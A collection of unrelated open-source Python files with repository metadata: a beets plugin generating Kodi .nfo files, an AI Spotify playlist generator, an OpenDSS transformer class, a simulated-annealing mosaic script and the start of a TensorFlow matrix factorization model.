        kodi_lib_path = kodi_path() + album_path[length:]
        out_data = album_path, kodi_lib_path
    return out_data


def artist_path(albumid):
    """Get (local artist path, kodi-visible artist path) for the album's artist."""
    out_data = []
    root = str(config['directory'])
    for album in lib.albums(albumid):
        albumpath = album.path.decode("utf-8")
        albumartist = album.albumartist
        if albumartist == os.path.basename(os.path.dirname(albumpath)):
            # Simple layout: .../<artist>/<album>
            artist_path = os.path.dirname(albumpath)
            kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):]
        else:
            # Derive the artist directory from the configured path template.
            folder = os.path.join(root, str(config['paths']['default']))
            config_items = Path(folder).parts
            folder_length = len(config_items)
            indices = [i for i, s in enumerate(config_items)
                       if 'albumartist' in s]
            y = int(folder_length - indices[0])
            artistpath_items = list(Path(albumpath).parts[-y:-1])
            artist_path = os.path.join(root, *artistpath_items)
            kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):]
        out_data = artist_path, kodi_lib_path
    return out_data


def thumbs(tag, albumid):
    """Name paths where art files reside."""
    if "artist" in tag:
        thumbs = []
        for a in artist_path(albumid):
            thumb = os.path.join(a, 'artist.tbn')
            thumbs.append(thumb)
        return thumbs
    if "album" in tag:
        for album in lib.albums(albumid):
            if album.artpath:
                art_file = os.path.basename(album.artpath.decode('utf8'))
                thumbs = []
                for a in album_path(albumid):
                    thumb = os.path.join(a, art_file)
                    thumbs.append(thumb)
                return thumbs


def album_nfo_text(albumid, mb_albumid, mb_artistid):
    """Create MBID URL only text file."""
    album_nfo_file = os.path.join(album_path(albumid)[0], 'album.nfo')
    with open(album_nfo_file, 'w') as f:
        f.write(LINK_ALBUM.format(mb_albumid))
    if os.path.basename(artist_path(albumid)[0]) in ['Various Artists',
                                                     'Soundtracks',
                                                     'Compilations']:
        pass  # No artist.nfo file for compilation albums
    else:
        # BUGFIX: was 'artsist.nfo' — Kodi never picked the misnamed file up.
        artist_nfo_file = os.path.join(artist_path(albumid)[0], 'artist.nfo')
        with open(artist_nfo_file, 'w') as f:
            f.write(LINK_ARTIST.format(mb_artistid))


def album_nfo_xml(albumid):
    """Create XML file with album information."""
    for album in lib.albums(albumid):
        albumnfo = os.path.join(album.path.decode('utf8'), 'album.nfo')
        albumid = 'mb_albumid:' + album.mb_albumid
        root = et.Element('album')
        # Perf fix: fetch the remote/library data once per album instead of
        # once per tag (album_info may hit theaudiodb.com each call).
        info = album_info(albumid)
        track_list = album_tracks(albumid)
        # BUGFIX: the original overwrote the module-level album_tags entries
        # with Element objects, corrupting every subsequent invocation.
        for idx, tag_name in enumerate(album_tags):
            tag_el = et.SubElement(root, tag_name)
            tag_el.text = info[idx]
        for p in album_path(albumid):
            path = et.SubElement(root, 'path')
            path.text = p
        if info[14] == '':
            for t in thumbs('album', albumid):
                thumb = et.SubElement(root, 'thumb')
                thumb.text = t
        else:
            thumb = et.SubElement(root, 'thumb')
            thumb.text = info[14]
            for t in thumbs('album', albumid):
                thumb = et.SubElement(root, 'thumb')
                thumb.text = t
        albumartistcredits = et.SubElement(root, 'albumArtistCredits')
        artist = et.SubElement(albumartistcredits, 'artist')
        artist.text = album.albumartist
        musicbrainzartistid = et.SubElement(
            albumartistcredits, 'musicBrainzArtistID')
        musicbrainzartistid.text = album.mb_albumartistid
        for row in track_list:
            track = et.SubElement(root, 'track')
            position = et.SubElement(track, 'position')
            position.text = str(row[0])
            title = et.SubElement(track, 'title')
            title.text = row[3]
            duration = et.SubElement(track, 'duration')
            duration.text = row[1]
            musicbrainztrackid = et.SubElement(track, 'musicBrainzTrackID')
            musicbrainztrackid.text = row[2]
        xml = et.tostring(
            root, pretty_print=True, xml_declaration=True,
            encoding='UTF-8', standalone="yes").decode()
        # BUGFIX: print(..., file=open(...)) leaked the file handle.
        with open(albumnfo, 'w+') as fh:
            print(xml, file=fh)


def artist_nfo_xml(albumid):
    """Create XML file with artist information."""
    for album in lib.albums(albumid):
        albumid = 'mb_albumid:' + album.mb_albumid
        artistid = 'mb_albumartistid:' + album.mb_albumartistid
        artistnfo = os.path.join(
            album.path.decode('utf8'), os.pardir, 'artist.nfo')
        if album.albumartist in ['Various Artists', 'Soundtracks',
                                 'Compilations']:
            pass  # no artist.nfo for compilation pseudo-artists
        else:
            root = et.Element('artist')
            # Perf fix: one lookup instead of one per tag; see album_nfo_xml.
            info = artist_info(albumid)
            # BUGFIX: do not clobber the module-level artist_tags list.
            for idx, tag_name in enumerate(artist_tags):
                tag_el = et.SubElement(root, tag_name)
                tag_el.text = info[idx]
            for p in artist_path(albumid):
                path = et.SubElement(root, 'path')
                path.text = p
            if info[11] == '':
                thumb = et.SubElement(root, 'thumb')
                thumb.text = ''
            else:
                thumb_location = os.path.join(
                    album.path.decode('utf8'), os.pardir, 'artist.tbn')
                urllib.request.urlretrieve(info[11], thumb_location)
                thumb = et.SubElement(root, 'thumb')
                thumb.text = info[11]
            for t in thumbs('artist', albumid):
                thumb = et.SubElement(root, 'thumb')
                thumb.text = t
            fanart = et.SubElement(root, 'fanart')
            fanart.text = info[12]
            for row in artist_albums(artistid):
                album_el = et.SubElement(root, 'album')
                title = et.SubElement(album_el, 'title')
                title.text = row[1]
                year = et.SubElement(album_el, 'year')
                year.text = str(row[0])
            xml = et.tostring(
                root, pretty_print=True, xml_declaration=True,
                encoding='UTF-8', standalone="yes").decode()
            # BUGFIX: close the output file deterministically.
            with open(artistnfo, 'w+') as fh:
                print(xml, file=fh)


def update_kodi(host, port, user, password):
    """Send request to the Kodi api to start a library refresh.

    By Pauli Kettunen.  Content-Type: application/json is mandatory
    according to the kodi jsonrpc documentation.
    """
    url = "http://{0}:{1}/jsonrpc/".format(host, port)
    headers = {'Content-Type': 'application/json'}
    # Create the payload. Id seems to be mandatory.
    payload = {'jsonrpc': '2.0', 'method': 'AudioLibrary.Scan', 'id': 1}
    r = requests.post(
        url, auth=(user, password), json=payload, headers=headers)
    return r


class KodiNfo(BeetsPlugin):
    """KodiNfo Plugin."""

    def __init__(self):
        """Register config defaults and import/db-change listeners."""
        super(KodiNfo, self).__init__()
        # Adding defaults.
        self.config['audiodb'].add({
            "key": 1})
        config['kodi'].add({
            u'host': u'localhost',
            u'port': 8080,
            u'user': u'kodi',
            u'pwd': u'kodi',
            u'nfo_format': 'xml',
            u'library_name': 'music'})
        config['kodi']['pwd'].redact = True
        self.register_listener('album_imported', self.create_nfos)
        self.register_listener('database_change', self.listen_for_db_change)

    def create_nfos(self, lib, album):
        """Create nfos as per choice in config."""
        try:
            # Check if MBID is valid UUID as per MB recommendations
            UUID(album.mb_albumid)
            self._log.info(u'Album ID is valid MBID...creating .nfos')
            albumid = 'mb_albumid:' + album.mb_albumid
            mb_albumid = album.mb_albumid
            mb_artistid = album.mb_albumartistid
            nfo_format = '{0}'.format(config['kodi']['nfo_format'])
            # NOTE(review): substring test — any fragment of
            # 'mbid_only_text' (e.g. 'text') selects the text format;
            # presumably `==` was intended, but kept for compatibility.
            if nfo_format in 'mbid_only_text':
                self._log.info(u'Creating url only text format .nfo file...')
                album_nfo_text(albumid, mb_albumid, mb_artistid)
            else:
                self._log.info(u'creating XML format .nfo file...')
                album_nfo_xml(albumid)
                artist_nfo_xml(albumid)
        except ValueError:
            self._log.info(u"Album ID is not valid MBID...can't create .nfos")

    def listen_for_db_change(self, lib, model):
        """Listen for beets db change and register the update."""
        self.register_listener('cli_exit', self.update)

    def update(self, lib):
        """When client exists try sending refresh request to Kodi server."""
        self._log.info(u'Updating Kodi library...')
        # Try to send update request.
        try:
            update_kodi(
                config['kodi']['host'].get(),
                config['kodi']['port'].get(),
                config['kodi']['user'].get(),
                config['kodi']['pwd'].get())
            self._log.info(u'... started.')
        except requests.exceptions.RequestException:
            self._log.warning(u'Update failed.')
peace899/beets2kodi
beetsplug/kodinfo.py
kodinfo.py
py
18,692
python
en
code
1
github-code
36
72582014823
import spotipy
import openai
import json
import argparse
import datetime
from dotenv import load_dotenv
import os

load_dotenv()
openai.api_key = os.environ.get("OPENAI_API_KEY")

parser = argparse.ArgumentParser(description="Enkelt commandline verktøy")
parser.add_argument("-p", type=str, default="AI genert liste", help="Prompten som beskriver playlisten")
parser.add_argument("-n", type=int, default=10, help="Hvor mange sanger ønsker du i playlisten")
args = parser.parse_args()


def get_playlist(prompt, count=10):
    """Ask the chat model for `count` songs matching `prompt`.

    Returns the parsed JSON array of {"song": ..., "artist": ...} dicts.
    Raises json.JSONDecodeError if the model reply is not valid JSON.
    """
    # One-shot example answer shown to the model.
    example_json = """
    [
      {"song": "Someone Like You", "artist": "Adele"},
      {"song": "Hurt", "artist": "Johnny Cash"},
      {"song": "Fix You", "artist": "Coldplay"},
      {"song": "Nothing Compares 2 U", "artist": "Sinead O'Connor"},
      {"song": "All By Myself", "artist": "Celine Dion"},
      {"song": "Tears in Heaven", "artist": "Eric Clapton"},
      {"song": "My Immortal", "artist": "Evanescence"},
      {"song": "I Can't Make You Love Me", "artist": "Bonnie Raitt"},
      {"song": "Everybody Hurts", "artist": "R.E.M."},
      {"song": "Mad World", "artist": "Gary Jules"}
    ]
    """
    messages = [
        {"role": "system",
         # BUGFIX: the format example placeholder was malformed
         # (">song_title>" instead of "<song_title>").
         "content": """You are a helpfull playlist generating assistant.
         You should generate a list of songs and their artists accordning to a text prompt.
         You should retur it as a json array, where each element follows this format:
         {"song": <song_title>, "artist": <artist_name>}
         """
         },
        {"role": "user",
         "content": """Generate a playlist of 10 songs based on this prompt: super super sad songs
         """
         },
        {"role": "assistant",
         "content": example_json
         },
        {"role": "user",
         "content": f"Generate a playlist of {count} songs based on this prompt: {prompt}"
         },
    ]
    response = openai.ChatCompletion.create(
        messages=messages,
        model="gpt-3.5-turbo",
        max_tokens=400,
    )
    playlist = json.loads(response["choices"][0]["message"]["content"])
    return (playlist)


playlist = get_playlist(args.p, args.n)
## JSON format for artists and songs
print(playlist)

sp = spotipy.Spotify(
    auth_manager=spotipy.SpotifyOAuth(
        client_id=os.environ.get("SPOTIFY_CLIENT_ID"),
        client_secret=os.environ.get("SPOTIFY_CLIENT_SECRET"),
        redirect_uri="http://localhost:8888/",
        scope="playlist-modify-private"
    )
)

current_user = sp.current_user()
track_ids = []
assert current_user is not None

for item in playlist:
    artist, song = item["artist"], item["song"]
    query = f"{song} {artist}"
    search_results = sp.search(q=query, type="track", limit=10)
    # BUGFIX: skip songs Spotify cannot find instead of crashing with
    # IndexError on an empty result list.
    items = search_results["tracks"]["items"]
    if not items:
        continue
    track_ids.append(items[0]["id"])

playlist_prompt = args.p
created_playlist = sp.user_playlist_create(
    current_user["id"],
    public=False,
    name=f"{'AI - '} {playlist_prompt} {datetime.datetime.now().strftime('%c')}"
)
sp.user_playlist_add_tracks(
    current_user["id"],
    created_playlist["id"],
    track_ids
)
donadelicc/MySpotify
utils/local_app.py
local_app.py
py
3,072
python
en
code
0
github-code
36
40129073796
from openpydss.opendss.model.dssobject import DSSObject


class Transformer(DSSObject):
    """OpenDSS Transformer element.

    Every constructor argument (all OpenDSS transformer properties, given as
    strings in OpenDSS text syntax) is stored verbatim as an instance
    attribute of the same name.
    """

    def __init__(
        self,
        phases="3",
        windings="2",
        wdg="1",
        bus="transformer_1",
        conn="wye ",
        kV="12.47",
        kVA="1000",
        tap="1",
        pct_R="0.2",
        Rneut="-1",
        Xneut="0",
        buses="[transformer_1, transformer_2, ]",
        conns="[wye, wye, ]",
        kVs="[12.47, 12.47, ]",
        kVAs="[1000, 1000, ]",
        taps="[1, 1, ]",
        XHL="7",
        XHT="35",
        XLT="30",
        Xscarray="[7, ]",
        thermal="2",
        n=".8",
        m=".8",
        flrise="65",
        hsrise="15",
        pct_loadloss="0.4",
        pct_noloadloss="0",
        normhkVA="1100",
        emerghkVA="1500",
        sub="n",
        MaxTap="1.1",
        MinTap="0.9",
        NumTaps="32",
        subname="",
        pct_imag="0",
        ppm_antifloat="1",
        pct_Rs="[0.2, 0.2, ]",
        bank="",
        XfmrCode="",
        XRConst="NO",
        X12="7",
        X13="35",
        X23="30",
        LeadLag="Lag",
        WdgCurrents="0, (0), 0, (0), 0, (0), 0, (0), 0, (0), 0, (0), ",
        Core="shell",
        RdcOhms="0.08811718",
        Seasons="1",
        Ratings="[1100,]",
        normamps="50.929",
        emergamps="69.449",
        faultrate="0.007",
        pctperm="100",
        repair="36",
        basefreq="60",
        enabled="true",
        like="",
    ):
        # Snapshot the parameter map before any other local is created, so
        # locals() contains exactly `self` plus the constructor arguments.
        arguments = dict(locals())
        del arguments['self']
        super().__init__()
        # Mirror every argument onto the instance under the same name,
        # exactly as the original long list of `self.x = x` assignments did.
        for attribute_name, value in arguments.items():
            setattr(self, attribute_name, value)
munizrodrigo/openpydss
openpydss/opendss/model/transformer.py
transformer.py
py
3,379
python
en
code
0
github-code
36
9104252011
##annealing.py
# this python script bruteforces swaps until N iterations are reached. best is saved and shown
from classes.bucket import Bucket
from classes.target import Target
from classes.generate import Generate
from similarity import Similarity, Delta
from random import random
from math import exp


def Annealing(targetpath, bucketpath, nrow, ncol, params = None ):
    """Simulated annealing over tile swaps: propose a swap, accept it if it
    improves the similarity score (or with Boltzmann probability otherwise),
    and return (target, best bucket seen).

    params, if given, supplies TMAX / beta / beta_incr; otherwise defaults
    below are used.  Temperature is cooled by multiplying beta each step.
    """
    t = 0
    if params == None:
        TMAX = 50000000
        #TMAX = 1000
        beta = 0.0001
        beta_incr = 1.000001
    else:
        TMAX = params.TMAX
        beta = params.beta
        beta_incr = params.beta_incr
    A = Target(targetpath,nrow,ncol)
    x = Bucket(bucketpath, A.size)
    # Lower similarity score is better (it is minimized below).
    Smin = Similarity(A.matrix,x.vector, nrow, ncol)
    s = Smin
    # NOTE(review): `xmin = x` binds the same Bucket object that x.swap()
    # later mutates, so xmin is NOT a snapshot of the best state — confirm
    # whether a copy (e.g. copy.deepcopy) is intended here.
    xmin = x
    while t < TMAX :
        x.propose()
        indexes = (x.i1, x.i2)
        #for now this works only with nrow = ncol, easy to implement the more general tho
        deltas = Delta(A.matrix,x.vector, indexes, nrow, ncol)
        s1 = s+deltas
        # Progress report every 1% of TMAX iterations.
        if t%(TMAX/100)==0:
            print(str(int(t/TMAX*100))+r"% complete (beta= "+str(beta)+", deltas= "+str(deltas)+", smin= "+str(Smin)+")")
        # record best
        # NOTE(review): the best score is recorded for the *proposed* swap even
        # when the swap is later rejected (x.swap() never applied) — verify.
        if s1 < Smin:
            xmin = x
            Smin = s1
        # accept swap
        accept = False
        if s1 < s: accept = True # to avoid unnecessary exp calculations
        elif exp( - beta * deltas)> random(): accept = True
        if accept == True:
            s = s1
            x.swap()
        t = t + 1
        beta = beta*beta_incr
    return (A, xmin)


if __name__ == "__main__":
    # Standalone run with hard-coded paths and a much longer schedule;
    # duplicates the loop in Annealing() above.
    nrow = 33
    ncol = 33
    A = Target('/Users/saramilone/ricciobbello/mosaic-bot/images/targets/drow_portrait.jpeg',nrow,ncol)
    x = Bucket('/Users/saramilone/ricciobbello/mosaic-bot/images/drow_ranger_edit', A.size)
    Smin = Similarity(A.matrix,x.vector, nrow, ncol)
    s = Smin
    xmin = x
    t = 0
    TMAX = 1000000000
    #TMAX = 1000
    beta = 0.00005
    beta_incr = 1.00000001
    while t < TMAX :
        x.propose()
        indexes = (x.i1, x.i2)
        #for now this works only with nrow = ncol, easy to implement the more general tho
        deltas = Delta(A.matrix,x.vector, indexes, nrow, ncol)
        s1 = s+deltas
        if t%(TMAX/100)==0:
            print(str(int(t/TMAX*100))+r"% complete (beta= "+str(beta)+", deltas= "+str(deltas)+", smin= "+str(Smin)+")")
        # record best
        if s1 < Smin:
            xmin = x
            Smin = s1
        # accept swap
        accept = False
        if s1 < s: accept = True # to avoid unnecessary exp calculations
        elif exp( - beta * deltas)> random(): accept = True
        if accept == True:
            s = s1
            x.swap()
        t = t + 1
        beta = beta*beta_incr
    print(Smin)
    print(x.cap)
    # Render the best arrangement found to an output image.
    g = Generate('/Users/saramilone/ricciobbello/mosaic-bot/images/out_nonorm.png',A,xmin)
    print("size x: "+str(g.size_x))
    print("size y: "+str(g.size_y))
    print(A.matrix)
    print(x.vector)
porcherface/mosaic-bot
code/annealing.py
annealing.py
py
2,675
python
en
code
0
github-code
36
40558916970
#!/usr/bin/python3 def roman_to_int(roman_string): if roman_string is None or isinstance(roman_string, str) is not True: return 0 dicta = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000} tot = 0 prev = 0 for let in roman_string: if let not in dicta: return 0 if dicta[let] > tot: tot = dicta[let] - tot elif dicta[let] > prev: tot = tot + dicta[let] - prev * 2 else: tot = dicta[let] + tot prev = dicta[let] return tot
kofikorang12/alx-higher_level_programming
0x04-python-more_data_structures/12-roman_to_int.py
12-roman_to_int.py
py
574
python
tr
code
0
github-code
36
29647730897
import os import sys import subprocess BASE_PATH = os.getcwd() #python folder def drugbank_search(query): content = [] os.chdir("./../java_lucene_index") #process = subprocess.Popen(['ls'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) process = subprocess.Popen("./launch.sh drugbank "+query, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() stdout = stdout.decode("utf-8") stderr = stderr.decode("utf-8") lines = stdout.splitlines() for line in lines: table = line.split('#-#') content.append(table) os.chdir(BASE_PATH) return content def main(): #default query query = "\"id : DB0000*\"" argc = len(sys.argv) if (argc > 1): query = sys.argv[1] query = f'"{query}"' content = drugbank_search(query) n = len(content) print(f"result : {n}") if (n>0): elem = content[0] print(f"id : {elem[0]}") print(f"name : {elem[1]}") print(f"description : {elem[2]}") print(f"indication : {elem[3]}") print(f"toxicity : {elem[4]}") print(f"synonyms : {elem[5]}") print(f"atc_code : {elem[6]}") if __name__ == '__main__': main()
Hamza-ABDOULHOUSSEN/gmd2k22
python/drugbank/drugbank_index_query.py
drugbank_index_query.py
py
1,259
python
en
code
0
github-code
36
42215123133
import json
import os
import datetime
import scipy.optimize
import sklearn.metrics
import aop
import aop.api


class DailyIndexPrediction:
    """Predict DAU/DNU for an app from Umeng analytics data.

    Retention is modeled as a power law fitted to recent retention rates;
    daily new users (DNU) are cached in dnu.json and refreshed from the
    Umeng API when stale.
    """

    def __init__(self):
        # read the config.json in the current directory
        with open(os.path.dirname(__file__) + '/config.json', 'r') as file_obj:
            self.config = json.load(file_obj)
        # set gateway domain name
        aop.set_default_server('gateway.open.umeng.com')
        # set apiKey and apiSecurity
        aop.set_default_appinfo(self.config['api_key'], self.config['api_security'])
        # Number of trailing days whose cohorts still contribute to DAU.
        self.factor = 54
        self.dnu = list()
        self.retention = list()
        self._set_dnu_data()
        self._set_retention_data()

    def _get_retention_rate(self):
        """support 7-days average retention at most"""
        # setup the start and end date of the retention request (last 37 days)
        start_date = datetime.datetime.now().date() + datetime.timedelta(days=-37)
        end_date = datetime.datetime.now().date()
        # build request
        req = aop.api.UmengUappGetRetentionsRequest()
        # send api request
        try:
            resp = req.get_response(None,
                                    appkey=self.config['app_key'],
                                    startDate=str(start_date),
                                    endDate=str(end_date),
                                    periodType='daily'
                                    )
        except aop.ApiError as e:
            print('Exception returned by API gateway:', e)
        except aop.AopError as e:
            print('Exception before client API gateway request:', e)
        except Exception as e:
            print('Other unknown exceptions:', e)
        # NOTE(review): if the request above raised, `resp` is unbound and the
        # next line raises NameError — confirm whether this should re-raise.
        # print(resp)
        # extract retention rate info; reversed so index 0 is the most recent day
        retentions = [info['retentionRate'] for info in resp['retentionInfo']]
        retentions.reverse()
        return retentions

    def _build_coordinate(self, avg_days=3):
        """Build (day, avg retention rate) points for curve fitting.

        For each Umeng retention horizon x, average the x-day retention of the
        `avg_days` most recent cohorts old enough to have that data point.
        """
        retentions = self._get_retention_rate()
        # umeng retention days
        x_labels = [1, 2, 3, 4, 5, 6, 7, 14, 30]
        y_labels = list()
        for x in x_labels:
            tmp_lst = []
            for day in range(x-1, avg_days+x-1):
                tmp_lst.append(retentions[day][x_labels.index(x)])
            y_labels.append(sum(tmp_lst)/len(tmp_lst))
        return x_labels, y_labels

    def _curve_fitting(self):
        """Fit retention(day) = a * day**b and return (a, b)."""
        x_labels, y_labels = self._build_coordinate()

        def func(x, a, b):
            return a * (x ** b)

        popt, pcov = scipy.optimize.curve_fit(func, x_labels, y_labels)
        # y_pred = [func(x, popt[0], popt[1]) for x in x_labels]
        # r2 = sklearn.metrics.r2_score(y_labels, y_pred)
        # print('coefficient of determination:', r2)
        coefficient = popt[0]
        exponent = popt[1]
        return coefficient, exponent

    def _set_retention_data(self):
        """notice: day must be greater than 0,
        Calculate the retention according to the formula.
        """
        coefficient, exponent = self._curve_fitting()
        # Retention fraction (0..1) for days 1..180 from the fitted power law
        # (the API rates are percentages, hence the /100).
        self.retention = [coefficient * (day ** exponent) / 100 for day in range(1, 181)]

    def _update_dnu(self):
        """update dnu"""
        with open(os.path.dirname(__file__) + '/dnu.json', 'r') as file_obj:
            dnu_data = json.load(file_obj)
        today = datetime.datetime.now().date()
        last_date = max(dnu_data.keys())
        last_date = datetime.datetime.strptime(last_date, '%Y-%m-%d').date()
        # Cache is current when its newest entry is yesterday.
        if (today - last_date).days == 1:
            pass
        else:
            # update dnu for the missing date range [last+1, yesterday]
            start_date = last_date + datetime.timedelta(days=1)
            end_date = today - datetime.timedelta(days=1)
            # send api request
            req = aop.api.UmengUappGetNewAccountsRequest()
            try:
                resp = req.get_response(None,
                                        appkey=self.config['app_key'],
                                        startDate=str(start_date),
                                        endDate=str(end_date)
                                        )
            except aop.ApiError as e:
                print('Exception returned by API gateway:', e)
            except aop.AopError as e:
                print('Exception before client API gateway request:', e)
            except Exception as e:
                print('Other unknown exceptions:', e)
            # NOTE(review): as in _get_retention_rate, `resp` is unbound here
            # if the request failed.
            resp = resp['newAccountInfo']
            for i in resp:
                dnu_data[i['date']] = i['newUser']
            with open(os.path.dirname(__file__) + '/dnu.json', 'w') as file_obj:
                json.dump(dnu_data, file_obj, indent=8)
        return dnu_data

    def _set_dnu_data(self):
        """Load the last 180 days of DNU, most recent (yesterday) first."""
        dnu_data = self._update_dnu()
        dnu_lst = list()
        today = datetime.datetime.now().date()
        date_index = today
        date_index -= datetime.timedelta(days=1)
        for i in range(180):
            dnu_lst.append(dnu_data[str(date_index)])
            date_index -= datetime.timedelta(days=1)
        self.dnu = dnu_lst

    def test(self, days, goal):
        # Ad-hoc debugging helper; most of the original experiment is
        # commented out below.
        self._set_dnu_data()
        self._set_retention_data()
        print(self.retention)
        print(sum(self.retention[:6]))
        # print(sum(self.retentions[:3]))
        # print(sum([i[0]*i[1] for i in zip(self.retentions[24:self.factor], self.dnu[24:self.factor])]))
        # r_sum = sum(self.retentions[:days-1]) + 1
        # dnu_each_day = goal / r_sum
        # print()
        # print('GOAL: {} DAU in {} days.'.format(goal, days))
        # print('You need on average {} new users everyday.'.format(round(dnu_each_day), days))
        # print('The total number of new users in {} day[s] is {}.'.format(days, round(dnu_each_day)*days))
        # print('The total customer acquisition cost of {} new users is ¥{}.'.format(round(dnu_each_day)*days, round(dnu_each_day)*days*0.65))

    def dau_prediction(self, data_payload):
        """Predict DAU from either a constant daily DNU goal or an explicit
        per-day DNU map; returns a human-readable summary string.

        {
            "is_avg_dnu": 1,
            "dnu_data": {
                "goal_each_day": 10000,
                "target_date": "2020-11-24"
            }
        }
        {
            "is_avg_dnu": 0,
            "dnu_data": {
                "2020-11-21": 5000,
                "2020-11-22": 6000,
                "2020-11-23": 7000,
                "2020-11-24": 8000
            }
        }
        """
        # average DNU
        if int(data_payload['is_avg_dnu']):
            # extract data
            dnu_each_day = int(data_payload['dnu_data']['goal_each_day'])
            target_date = data_payload['dnu_data']['target_date']
            # calc timedelta
            target_date = datetime.datetime.strptime(target_date, '%Y-%m-%d').date()
            current_date = datetime.datetime.now().date()
            timedelta = (target_date - current_date).days
            # set dnu list
            # NOTE(review): dnu_lst aliases self.dnu and the slice assignment
            # below mutates it in place, so repeated calls see a polluted
            # self.dnu — confirm whether a copy was intended.
            dnu_lst = self.dnu
            dnu_lst[:0] = [dnu_each_day] * timedelta
            dnu_lst = dnu_lst[:self.factor]
            # set retention list
            retention_lst = self.retention[:self.factor]
            # calc ideal DAU: sum over cohorts of DNU * retention, plus today's new users
            ideal_dau = sum([x*y for x, y in zip(dnu_lst, retention_lst)]) + dnu_each_day
            ideal_dau = round(ideal_dau)
            return '{dnu} new users for today and future {timedelta} day(s), you will reach {dau} active users on {date}'.format(dnu=dnu_each_day, timedelta=timedelta, dau=ideal_dau, date=str(target_date))
        # custom DNU
        else:
            # extract data
            dnu_data = data_payload['dnu_data']
            last_date = max(dnu_data.keys())
            # calc timedelta
            timedelta = len(dnu_data.keys()) - 1
            # set dnu list (same in-place aliasing caveat as above)
            dnu_lst = self.dnu
            dnu_lst[:0] = reversed(list(dnu_data.values())[:timedelta])
            dnu_lst = dnu_lst[:self.factor]
            # set retention list
            retention_lst = self.retention[:self.factor]
            # calc ideal DAU
            ideal_dau = sum([x*y for x, y in zip(dnu_lst, retention_lst)]) + dnu_data[last_date]
            ideal_dau = round(ideal_dau)
            return 'You will reach {dau} active users on {date}'.format(dau=ideal_dau, date=last_date)

    def dnu_prediction(self, dau_goal=0, end_date=None):
        """Compute the constant DNU needed to hit `dau_goal` by `end_date`.

        {
            "dau_goal": 20000,
            "target_date": "2020-11-24"
        }
        """
        # calc timedelta
        # NOTE(review): the default end_date=None would crash strptime —
        # callers are expected to always pass a 'YYYY-MM-DD' string.
        start_date = datetime.datetime.now().date()
        end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d').date()
        timedelta = (end_date - start_date).days
        ideal_dnu = 0
        # future dau goal
        if timedelta >= 1:
            # from yesterday to past, total factor-timedelta days
            past_days = [x*y for x, y in zip(self.dnu, self.retention[timedelta:self.factor])]
            ideal_dnu = (dau_goal - sum(past_days)) / (sum(self.retention[:timedelta]) + 1)
            return 'You need to guarantee {} new users today and in the next {} day[s].'.format(round(ideal_dnu), timedelta)
        # today dau goal
        elif timedelta == 0:
            past_days = [x*y for x, y in zip(self.dnu, self.retention[:self.factor])]
            ideal_dnu = dau_goal - sum(past_days)
            return 'You need to guarantee {} new users today.'.format(round(ideal_dnu))
        else:
            return 'Wrong Date.'


# Algorithm notes (translated):
# - should this re-request the API on every run?
# - the 45-day/`factor` window should ideally adapt automatically
if __name__ == '__main__':
    predict = DailyIndexPrediction()
    predict.test(1, 1)
    # with open('predict_dau_b.json', 'r') as file_obj:
    #     data = json.load(file_obj)
    # print(predict.dau_prediction(data))
Silence-2020/mt-prediction
daily_index_prediction.py
daily_index_prediction.py
py
9,807
python
en
code
0
github-code
36
30910231452
import sys from PyQt5 import uic from PyQt5.QtGui import QPainter, QColor from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QMainWindow from random import randint class MyWidget(QMainWindow): def __init__(self): super().__init__() uic.loadUi('Ui.ui', self) self.do_paint = False self.pushButton.clicked.connect(self.run) def paintEvent(self, event): if self.do_paint is True: qp = QPainter() qp.begin(self) self.draw(qp) qp.end() def run(self): self.do_paint = True self.repaint() def draw(self, qp): qp.setBrush(QColor(237, 255, 33)) r = randint(1, 299) qp.drawEllipse(30, 120, r, r) if __name__ == '__main__': app = QApplication(sys.argv) ex = MyWidget() ex.show() sys.exit(app.exec_())
Dathator/Git-
main.py
main.py
py
870
python
en
code
0
github-code
36
14247809149
""" Author: Todd Zenger, Brandeis University The purpose of this code is to figure out how to bring the mean of two values of a large range down """ import numpy as np # Method 1: simply use variables to continuously check # Our two values x1 = 3 x2 = 555 # The number of times we add 2 n = 0 # We want this loop to run while the mean is greater than 10 while ((x1+x2+2*n)/(2+n)>10): n+=1 # If it fails, increase n by 1 print("Method 1: added {} times".format(n)) # Method 2: We can use Numpy to do much of the heavy work for us data = np.array([3,555]) while(np.mean(data)>10): data = np.append(data,2) # This sticks a value of 2 at the end of the array n_np = data.shape[0] - 2 # This finds the length and we take out the values of 3 and 555 print("Method 2: added {} times".format(n_np)) """ Discussion: Does this fit expected results mathematically? We solve with the definition of the mean: (3+555+2*N)/(N+2) <= 10 Solving this gives N as 67.25. When we round up, this gives 68, which is exactly what we we got. """
ToddZenger/PHYS19a
challenge/challenge-00-02.py
challenge-00-02.py
py
1,043
python
en
code
1
github-code
36
39276214746
import numpy as np
# NOTE(review): numpy is imported but unused in this module.
import tensorflow as tf


class TFModel(object):
    # Define and initialize the TensorFlow model, its weights, initialize session and saver
    # Weighted matrix factorization in TF1 graph mode: R (n, k) ≈ P (n, d) @ Q (k, d).T,
    # optionally with global/row/column intercepts, trained on (row, col, value) triples.

    def __init__(self, shape, learning_rate, alpha, regularization_rate, implicit,
                 loss, log_weights, fit_intercepts, optimizer, random_state=None):
        # shape is the (n, k, d) triple unpacked in _init_model_and_session.
        self.shape = shape
        self.learning_rate = learning_rate
        # alpha scales the confidence weights in the implicit-feedback case.
        self.alpha = alpha
        self.regularization_rate = regularization_rate
        self.implicit = implicit
        # loss: 'logistic' selects sigmoid + log loss, anything else means MSE.
        self.loss = loss
        self.log_weights = log_weights
        self.fit_intercepts = fit_intercepts
        # optimizer: 'Ftrl' selects FtrlOptimizer, anything else means Adam.
        self.optimizer = optimizer
        self.random_state = random_state
        tf.set_random_seed(self.random_state)
        self._init_model_and_session()

    def _init_model_and_session(self):
        """Build the TF1 computation graph and start a session on it."""
        # the R (n, k) matrix is factorized to P (n, d) and Q (k, d) matrices
        n, k, d = self.shape

        self.graph = tf.Graph()
        with self.graph.as_default():

            with tf.name_scope('constants'):
                alpha = tf.constant(self.alpha, dtype=tf.float32)
                regularization_rate = tf.constant(self.regularization_rate, dtype=tf.float32,
                                                  name='regularization_rate')

            with tf.name_scope('inputs'):
                # Mini-batch of (row index, column index, rating/count) triples.
